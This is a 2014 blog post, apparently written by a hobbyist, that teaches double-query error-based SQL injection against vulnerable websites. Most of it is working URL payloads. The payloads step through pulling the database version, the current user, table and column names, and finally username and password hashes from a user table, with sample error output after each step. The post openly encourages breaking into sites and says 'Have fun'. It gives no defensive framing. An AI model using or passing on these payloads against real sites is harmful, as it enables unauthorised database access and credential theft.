Searching...
Saturday, 22 March 2014

Sql injection (double query eror based)


Sql injection (double query eror based)

Today i will teach you how can we use sql injection(double query)
so for this first you need vuln site..



ok after getting a vuln site as a normal you get the column counts

suppose it has 4 columns so next your comand will be


Code:
www.site.com/index.php?id=-12 union select 1,2,3,4--

but when you press enter it gives eror :-0

the eror is
Code:
(select statment have diffrent numbers of column)
so now what??

dont be cunfused its time for using double query sql injection

so your command will look like this:-


Code:

www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(version())+from+information_schema.tables+limit+0,1),floor(Rand(0)*2))a+fr
om+information_schema.tables+group+by+a)b)


and result will look like this

Code:
"Duplicate entry '5.0.92-community-log1' for key 1"so here '5.0.92-community-log1' is sites version.

now we have to find sites current_user so our command will be:-

Code:

www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(current_user())+from+information_schema.tables+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)
result
Code:
"Duplicate entry user+localhost1' for key 1"
ok now we will find tables name so our command will be:-


Code:

www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(table_name)+from+information_schema.tables+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)

result will be
Code:
"duplicate entry 'table_name1' for key 1'now keep incresing the limit you can find it near
Code:
((table_name)+from+information_schema.tables+limit+0,1) )

ok now we will find tables which contains the data so our command will be:-


Code:

www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)
result
Code:
"duplicate entry tablename1' for key 1"

so here again increase the limits value untill you get the table like auth,,user,,admin,,login etc

ok now suppose we have table name "user" so next step is to find columns of this table our command will be:-


Code:

www.site.com/index.php?id=-12+and+(select+1+from(select%0Acount(*),concat((select+concat(column_name)+from+information_schema.columns+where+table_name=<hex value of table>+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)

result
Code:
"Duplicate entry 'column name1' for key 1'

again keep changing limits value untill you get columns like username,password

ok now we have columns username and password we need tha data inside the columns so our command will be:-


Code:

www.site.com/index.php?id=-12+and+(select+1+from(select%0Acount(*),concat((select+concat(username,0x3a,password)+from+user+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)
result
Code:
"Duplicate entry 'admin:3d145b6d4827e1f25994a3da418419e41' for key 1" 
now you have user and pass you got fucked the site madly......Have fun

0 comments:

Post a Comment

 
Back to top!